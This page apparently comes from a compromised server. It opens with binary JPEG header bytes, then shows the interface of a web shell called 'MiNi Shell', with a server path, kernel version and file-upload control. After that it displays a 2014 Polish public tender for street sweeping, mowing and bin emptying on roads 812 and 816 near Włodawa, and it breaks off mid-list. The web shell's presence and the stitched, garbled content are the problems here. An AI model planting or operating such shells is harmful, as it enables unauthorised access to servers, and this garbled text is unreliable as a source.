JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140402/70921-N-2014.html

<p class="kh_header"><b>Włodawa: Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW we Włodawie
tj. zamiatanie ulic, chodników i ścieżek rowerowych, koszenie trawników oraz sprzątanie pasa i opróżnianie koszy ze śmieci:
               -  zadanie nr 1 droga wojewódzka nr 812,
                - zadanie nr 2 droga wojewódzka nr 816</b><br>
<b>Numer ogłoszenia: 70921 - 2014; data zamieszczenia: 02.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW we Włodawie
tj. zamiatanie ulic, chodników i ścieżek rowerowych, koszenie trawników oraz sprzątanie pasa i opróżnianie koszy ze śmieci:
               -  zadanie nr 1 droga wojewódzka nr 812,
                - zadanie nr 2 droga wojewódzka nr 816.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia:

 Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW we Włodawie
tj. zamiatanie ulic, chodników i ścieżek rowerowych, koszenie trawników oraz sprzątanie pasa i opróżnianie koszy ze śmieci:
               -  zadanie nr 1 droga wojewódzka nr 812,
               - zadanie nr 2 droga wojewódzka nr 816

2 Zakres zamówienia:

A. Zadanie Nr 1

1) Oczyszczanie (zamiatanie) nawierzchni drogi wojewódzkiej Nr 812 Biała Podlaska - Wisznice - Włodawa - Chełm - Krasnystaw rondo im. Kuraszkiewicza we Włodawie, oczyszczanie (zamiatanie) chodników i ścieżki rowerowej.
2) Sprzątanie pasa drogowego.
3) Koszenie trawników.
4) Opróżnianie koszy ze śmieci

A1. Warunki wykonania oczyszczenia (zamiatania) nawierzchni drogi wojewódzkiej Nr 812 (rondo im. Kuraszkiewicza), chodników i ścieżki rowerowej

1) Jezdnię należy oczyścić na szerokości 0,75 mb od krawędzi (krawężnika) po obu
     stronach drogi w zakresie zgodnym z przedmiarem.
2) Chodniki i ścieżkę rowerową oczyścić na całej szerokości w zakresie zgodnym z
    przedmiarem
3) Oczyszczenie (zamiatanie) można wykonywać mechanicznie lub ręcznie.
4) Do oczyszczania mechanicznego należy stosować (szczotki mechaniczne)
    urządzenia dwuszczotkowe, w skład których wchodzi szczotka wykonana z
    twardych elementów czyszczących, służąca do zdrapywania i usuwania
    zanieczyszczeń, oraz szczotka miękka służąca do zamiatania i usuwania
    niezwiązanych nieczystości.
5) Zebrane odpady Wykonawca ma obowiązek zagospodarować zgodnie z  ustawą o
    odpadach z dnia 14 grudnia 2012 r.  (Dz.U. 2013  poz. 21). 
6) Ze względu na duże pylenie powstające w procesie czyszczenia, szczotki
    powinny być wyposażone w urządzenie pochłaniające pyły oraz umożliwiające
    czyszczenie powierzchni na sucho i na mokro.
7) W szczególnych przypadkach (bardzo duże zanieczyszczenie) oczyszczenie
    nawierzchni można wykonać przez spłukanie wodą
8) Wykonawca o każdorazowej potrzebie oczyszczania będzie powiadamiany przez
    Zamawiającego pisemnie.
9) Przewidywana krotność oczyszczenia (zamiatania) - 2
10) Zamawiający zastrzega sobie prawo zmniejszenia ilości krotności oczyszczeń.
11) Od momentu otrzymania informacji o konieczności oczyszczenia Wykonawca
    winien wykonać je w ciągu 5 dni;
12) Odbiór zostanie dokonany po każdorazowym wykonaniu oczyszczenia w okresie
    2 dni po pisemnym zgłoszeniu.
13) Wykonawca będzie prowadził oczyszczanie z zachowaniem wszelkich warunków
    bezpieczeństwa.
14) Pracownicy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt
    bezwzględnie winien być wyposażony w lampę błyskową koloru pomarańczowego.

A2. Warunki wykonania sprzątania pasa drogowego drogi wojewódzkiej Nr 812 

1) Sprzątanie obejmuje cały pas drogowy łącznie z chodnikiem, pasem zieleni
    zgodnie z przedmiarem.
2) Sprzątanie polega na wyzbieraniu wszelkich nieczystości stałych zalegających w
    pasie drogowym.
3) Sprzątanie winno się odbywać w każdą środę bez wezwania począwszy
    od dnia podpisania umowy  do 31 grudnia 2014 r.:
4) W przypadku gdy w środę wypada święto, sprzątanie należy wykonać w
    następnym dniu roboczym.
5) Przewidywana krotność wykonania - 35
6) Zamawiający zastrzega prawo zmniejszenia krotności wykonania usługi w zależności 
    od warunków atmosferycznych (opady i zaleganie śniegu) 
7) Zebrane odpady Wykonawca ma obowiązek zagospodarować zgodnie z ustawą o
    odpadach z dnia 14 grudnia 2012 r. (Dz.U. 2013 poz. 21). 
    Na potwierdzenie Wykonawca przedłoży wraz fakturą dokument potwierdzający
    prawidłowe zagospodarowanie odpadów (kartę przekazania odpadów).
8) Pracownicy dokonujący sprzątania powinni być ubrani w kamizelki ostrzegawcze
9) Wykonawca winien prowadzić prace związane ze sprzątaniem z zachowaniem
    wszelkich warunków bezpieczeństwa, za wszystkie zdarzenia wynikłe z
    prowadzonych w sposób nieprawidłowy prac wykonawca ponosi pełną
    odpowiedzialność.
10) Wykonanie usługi potwierdzi pisemnie w dniu następnym osoba nadzorująca ze
     strony Zamawiającego 

A3. Warunki wykonania koszenia trawników 

1) Koszenie obejmuje koszenie traw, samosiewów i jednorocznych odrostów na
    trawnikach będących w pasie drogowym w zakresie zgodnym z przedmiarem.
2) Koszenie należy wykonać w sposób gwarantujący należytą jakość usługi.
3) Koszenia dokonać kosiarkami posiadającymi spalinowymi lub kosami na wysięgniku.
4) Kosiarki winny posiadać fabrycznie montowane osłony.
5) Zabrania się stosowania kosiarek rotacyjnych.
6) W miejscach trudno dostępnych np. przy i pod barierami, wokół pachołków i
    znaków drogowych oraz innych urządzeniach drogowych należy bezwzględnie
    stosować kosy na wysięgniku.
7) Koszenie należy wykonać na wysokości 2 - 3 cm od powierzchni gruntu w terminie:
    - 12 dni od daty zgłoszenia przez Zamawiającego potrzeby koszenia (koszenie wraz
           ze zgrabieniem i usunięciem wykoszonej trawy).
    - 10 dni dni od daty zgłoszenia przez Zamawiającego potrzeby koszenia (koszenie bez
           grabienia i usunięcia wykoszonej trawy).
8) Skoszoną trawę, chwasty i odrosty, zebrane odpady Wykonawca ma obowiązek
    zagospodarować zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. 
    (Dz.U. 2013 r.  poz. 21). 
9) O każdorazowej potrzebie koszenia trawników Wykonawca będzie powiadamiany
    przez Zamawiającego pisemnie.
10) Odbiór zostanie dokonany po każdorazowym wykonaniu koszenia w ciągu 3 dni
      po pisemnym zgłoszeniu.
11)Trawniki należy kosić w zakresach zgodnych z podanym przedmiarem 
12) Przewidywana krotność koszeń w ciągu trwania umowy - 3.
13) Zamawiający zastrzega sobie prawo zmniejszenia ilości krotności koszenia
      trawników.
14) Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków pracy
      w trakcie jej wykonywania oraz zapewnienia bezpieczeństwa osobom
      postronnym i przejeżdżającym pojazdom
15) Pracownicy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt
      bezwzględnie winien być wyposażony w lampę błyskową koloru
      pomarańczowego.

A4. Warunki opróżniania koszy ze śmieci.

1)  Opróżnianie koszy ze śmieci wraz z wymianą worków odbywać się będzie bez
     wezwania 2 razy w  tygodniu tj. poniedziałek i czwartek.
2)  Przewidywana krotność wykonania - 78
3) Zebrane śmiecie Wykonawca ma obowiązek zagospodarować zgodnie z ustawą o
    odpadach z dnia 14 grudnia 2012 r. (Dz.U. 2013 r. poz. 21).
    Na potwierdzenie Wykonawca przedłoży wraz z fakturą dokument potwierdzający
    prawidłowe zagospodarowanie odpadów  (kartę przekazania odpadów).
4)  W przypadku gdy w poniedziałek lub czwartek wypada święto, usługę należy
     wykonać w następnym dniu roboczym.
5) Wykonanie usługi potwierdzi pisemnie w dniu następnym osoba nadzorująca ze
     strony Zamawiającego 

B. Zadanie Nr 2

1) Oczyszczanie (zamiatanie) nawierzchni drogi wojewódzkiej Nr 816 Terespol -
    Sławatycze - Włodawa - Dorohusk - Zosin odcinek Suszno - Orchówek, 
    oczyszczanie (zamiatanie) chodników i ścieżki rowerowej.
2) Sprzątanie pasa drogowego.
3) Koszenie trawników.
4) Opróżnianie koszy ze śmieci

B1. Warunki wykonania oczyszczenia (zamiatania) nawierzchni drogi wojewódzkiej   Nr 816, chodników i ścieżki rowerowej

1) Jezdnię należy oczyścić na szerokości 0,75 m od krawędzi (krawężnika) po obu
     stronach drogi w zakresie zgodnym z przedmiarem.
2) Chodniki i ścieżkę rowerową oczyścić na całej szerokości
3) Oczyszczenie (zamiatanie) można wykonywać mechanicznie lub ręcznie.
4) Do oczyszczania mechanicznego należy stosować (szczotki mechaniczne)
    urządzenia dwuszczotkowe, w skład których wchodzi szczotka wykonana z
    twardych elementów czyszczących, służąca do zdrapywania i usuwania
    zanieczyszczeń, oraz szczotka miękka służąca do zamiatania i usuwania
    niezwiązanych nieczystości.
5) Zebrane odpady Wykonawca ma obowiązek zagospodarować zgodnie 
    z ustawą o odpadach z dnia 14 grudnia 2012 r. (Dz.U. 2013 r. poz. 21). 
6) Ze względu na duże pylenie powstające w procesie czyszczenia, szczotki
    powinny być wyposażone w urządzenie pochłaniające pyły oraz umożliwiające
    czyszczenie powierzchni na sucho i na mokro.
7) W szczególnych przypadkach (bardzo duże zanieczyszczenie) oczyszczenie
    nawierzchni można wykonać przez spłukanie wodą
8) Wykonawca o każdorazowej potrzebie oczyszczania będzie powiadamiany przez
    Zamawiającego pisemnie.
9) Przewidywana krotność oczyszczenia (zamiatania) - 4 
10) Zamawiający zastrzega sobie prawo zmniejszenia krotności oczyszczeń.
11) Od momentu otrzymania informacji na piśmie o konieczności oczyszczenia
    Wykonawca winien wykonać usługę w ciągu  5 dni:
12) Odbiór zostanie dokonany po każdorazowym wykonaniu oczyszczenia w okresie
    2 dni po pisemnym zgłoszeniu.
13) Wykonawca będzie prowadził oczyszczanie z zachowaniem wszelkich warunków
    bezpieczeństwa.
14) Pracownicy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt
    bezwzględnie winien być wyposażony w lampę błyskową koloru pomarańczowego.

B2. Warunki wykonania sprzątania pasa drogowego drogi wojewódzkiej Nr 816 

1) Sprzątanie obejmuje cały pas drogowy łącznie z chodnikiem, pasem zieleni
    w zakresie zgodnym z przedmiarem.
2) Sprzątanie polega na wyzbieraniu wszelkich nieczystości stałych zalegających w
    pasie drogowym.
3) Sprzątanie winno się odbywać w każdą środę bez wezwania, począwszy
    od dnia podpisania umowy  do 31 grudnia 2014 r.:
4) W przypadku gdy w środę wypada święto, sprzątanie należy wykonać w 
    następnym dniu roboczym.
5) Przewidywana krotność wykonania usługi - 35
6) Zamawiający zastrzega prawo zmniejszenia krotności wykonania usługi w zależności 
    od warunków atmosferycznych (opady i zaleganie śniegu) 
7) Zebrane odpady Wykonawca ma obowiązek zagospodarować zgodnie z  ustawą o
    odpadach z dnia 14 grudnia 2012 r. (Dz.U. 2013 r. poz. 21). 
    Na potwierdzenie Wykonawca przedłoży wraz fakturą dokument potwierdzający
    prawidłowe zagospodarowanie odpadów (kartę przekazania odpadów).
8) Pracownicy dokonujący sprzątania powinni być ubrani w kamizelki ostrzegawcze
9) Wykonawca winien prowadzić prace związane ze sprzątaniem z zachowaniem
    wszelkich warunków bezpieczeństwa, za wszystkie zdarzenia wynikłe z
    prowadzonych w sposób nieprawidłowy prac wykonawca ponosi pełną
    odpowiedzialność.
10) Wykonanie usługi potwierdzi pisemnie w dniu następnym osoba nadzorująca ze
     strony Zamawiającego 

B3. Warunki wykonania koszenia trawników 

1) Koszenie obejmuje koszenie traw, samosiewów i jednorocznych odrostów na
    trawnikach będących w pasie drogowym w zakresie zgodnym z przedmiarem.
2) Koszenie należy wykonać w sposób gwarantujący należytą jakość usługi.
3) Koszenia dokonać kosiarkami posiadającymi spalinowymi lub kosami na wysięgniku.
4) Kosiarki winny posiadać fabrycznie montowane osłony.
5) Zabrania się stosowania kosiarek rotacyjnych.
6) W miejscach trudno dostępnych np. przy i pod barierami, wokół pachołków i
    znaków drogowych oraz innych urządzeniach drogowych należy stosować
    bezwzględnie kosy na wysięgniku.
7) Koszenie należy wykonać na wysokości 2 - 3 cm od powierzchni gruntu w terminie:
    - 6 dni od daty zgłoszenia przez Zamawiającego potrzeby koszenia (koszenie wraz ze
          zgrabieniem i usunięciem wykoszonej trawy).
    - 4 dni od daty zgłoszenia przez Zamawiającego potrzeby koszenia (koszenie bez
        grabienia i usunięcia wykoszonej trawy).
8) Skoszoną trawę, chwasty i odrosty, zebrane odpady Wykonawca ma obowiązek
     zagospodarować zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 r. 
    (Dz.U. 2013 r.  poz. 21). 
9) O każdorazowej potrzebie koszenia trawników Wykonawca będzie powiadamiany
    przez Zamawiającego pisemnie.
10) Odbiór zostanie dokonany po każdorazowym wykonaniu koszenia w ciągu 2 dni
      po pisemnym zgłoszeniu.
11)Trawniki należy kosić w zakresach zgodnych z podanym przedmiarem 
12) Krotność koszeń w ciągu roku wynosi 4.
13) Zamawiający zastrzega sobie prawo zmniejszenia ilości krotności koszenia
      trawników.
14) Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków pracy
      w trakcie jej wykonywania oraz zapewnienia bezpieczeństwa osobom
      postronnym i przejeżdżającym pojazdom
15) Pracownicy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt
      bezwzględnie winien być wyposażony w lampę błyskową koloru pomarańczowego.

B4. Warunki opróżniania koszy ze śmieci.

1)  Opróżnianie koszy ze śmieci wraz z wymianą worków odbywać się będzie bez
     wezwania 2 razy w  tygodniu tj. poniedziałek i czwartek.
2)  Przewidywana krotność wykonania - 78
3) Zebrane śmiecie Wykonawca ma obowiązek zagospodarować zgodnie z ustawą o
    odpadach z dnia 14 grudnia 2012 r. (Dz.U. 2013 r. poz. 21).
    Na potwierdzenie Wykonawca przedłoży wraz z fakturą dokument potwierdzający
    prawidłowe zagospodarowanie odpadów  (kartę przekazania odpadów).
4)  W przypadku gdy w poniedziałek lub czwartek wypada święto, usługę należy
     wykonać w następnym dniu roboczym.
5) Wykonanie usługi potwierdzi pisemnie w dniu następnym osoba nadzorująca ze
     strony Zamawiającego 

3. Za wszystkie zdarzenia wynikłe z prowadzonych w sposób nieprawidłowy usług
    wykonawca ponosi pełną odpowiedzialność.
4. Pracownicy dokonujący sprzątania powinni być ubrani w kamizelki ostrzegawcze
5. Wykonawca winien prowadzić prace związane ze sprzątaniem z zachowaniem
    wszelkich warunków bezpieczeństwa, za wszystkie zdarzenia wynikłe z
    prowadzonych w sposób nieprawidłowy prac wykonawca ponosi pełną
    odpowiedzialność.
6. Usługi związane z pracami porządkowymi przy bieżącym utrzymaniu dróg mogą być wykonane tylko przez Wykonawcę dysponującym wymaganym sprzętem oraz
    doświadczeniem w tego typu pracach.
7. Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne
    zadania z zachowaniem pełnego zakresu usług. Wykonawca może złożyć ofertę na wykonanie jednego lub obu zadań wyszczególnionych w pkt III SIWZ.
8. Rozliczenie następować będzie raz w miesiącu na podstawie cen jednostkowych
    Wskazanych w formularzu cenowym na poszczególne zakresy zadania.
9. Wykonawca zobowiązuje się do zawarcia na własny koszt odpowiednich umów
    ubezpieczenia z tytułu odpowiedzialności cywilnej na czas realizacji zamówienia.
10. Ubezpieczeniu podlega odpowiedzialność cywilna kontraktowa oraz deliktowa za
    szkody oraz następstwa nieszczęśliwych wypadków dotyczące pracowników i osób trzecich, powstałe w związku z prowadzonymi pracami, w tym także ruchem
    pojazdów mechanicznych - wymagana suma ubezpieczenia nie mniej niż 50 tys.zł. na jedno zdarzenie.
12. Kopie polis lub dokumentów ubezpieczeniowych potwierdzone za zgodność
   z oryginałem Wykonawca przedłoży do wglądu Zamawiającemu najpóźniej w dniu
   przekazania miejsca wykonania zamówienia i następnie na każde żądanie
   Zamawiającego. Opóźnienie z tego tytułu będzie traktowane, jako powstałe
   z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany
   terminu zakończenia zamówienia.
13. W przypadku niewykonania obowiązku, o którym mowa w ust. 8, Zamawiający ma prawo do odstąpienia od umowy z przyczyn leżących po stronie Wykonawcy.
14. Zamawiający nie przewiduje udzielania zamówień uzupełniających.
15. Zgodnie z art. 30 ust. 4 ustawy Prawo zamówień publicznych, Zamawiający
    dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30,ust. 5 ustawy).
    Za rozwiązanie równoważne uznane będzie wykonanie usługi przy wykorzystaniu
    sprzętu innego niż określony w warunkach wykonania zaproponowane w ofercie, pod warunkiem, że ich parametry będą nie gorsze niż określone w w/w warunkach.
Szacunkowa wartość zamówienia netto: Zadanie Nr 1- 82488,33 PLN, Zadanie Nr 2 -49904,89 PLN.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 77.31.41.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:
- dla Zadania Nr 1 - 800,00 zł (słownie złotych: osiemset 00/100)
- dla Zadania Nr 2 - 500,00 zł (słownie złotych: pięćset 00/100)
2. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo
zamówień publicznych.
1) Pieniądzu;
2) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) Gwarancjach bankowych;
4) Gwarancjach ubezpieczeniowych;
5) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości (Dz. U. z 2007 Nr 42 poz. 275, z późń. zm.)
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w
Lublinie w Banku Zachodnim WBK S.A. 4 Oddział w Lublinie 
nr 89 1500 1520 1215 2004 1596 0000.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1. Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy
Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy
wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt.1 ustawy Prawo
bankowe z dnia 29 sierpnia 1997 (Dz. U z 2012 poz. 1376 z późn. zm.) polecenie
przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c
Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję
dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą
rachunku wierzyciela.
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku
nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2. Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za
wniesione w terminie, jeżeli wpłynie na konto ZDW w Lublinie przed upływem
terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału polegającego na posiadaniu
    uprawnień do wykonywania określonej działalności lub czynności w oparciu o
    przedłożoną kopię ważnej decyzji wydanej na podstawie art. 41 ustawy z dnia 14
    grudnia 2012 r o odpadach (Dz. U. z 2013 r. poz. 21)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału polegającego na 
    dysponowaniu odpowiednim potencjałem technicznym w oparciu o załącznik Wykaz potencjału technicznego. Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że dysponuje lub będzie dysponował (wraz z podstawą dysponowania) stosownie do oferowanego zakresu zamówienia jednostkami sprzętu i środkami transportu wymienionymi poniżej:
1. Szczotka mechaniczna -szt. 1/jedno zadanie
2. Kosiarka spalinowa do trawników - szt.	1/jedno zadanie
2. Wykaszarki - szt. 2/jedno zadanie
3. Ciągnik rolniczy z przyczepą lub samochód ciężarowy - szt. 1/jedno zadanie

W przypadku, gdy Wykonawca polega na potencjale technicznym innych podmiotów - Zamawiający żąda dołączenia do oferty, w szczególności, pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania lub kserokopię zobowiązania poświadczoną, za zgodność z oryginałem przez ten podmiot (zgodnie z wyrokami KIO nr; KIO 786/11, KIO 787/11, KIO 797/11, KIO 830/11, KIO 1008/11)  
UWAGA!
Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów winno posiadać formę pisemną, stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci.(Zgodnie z wyrokiem KIO2213/11).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
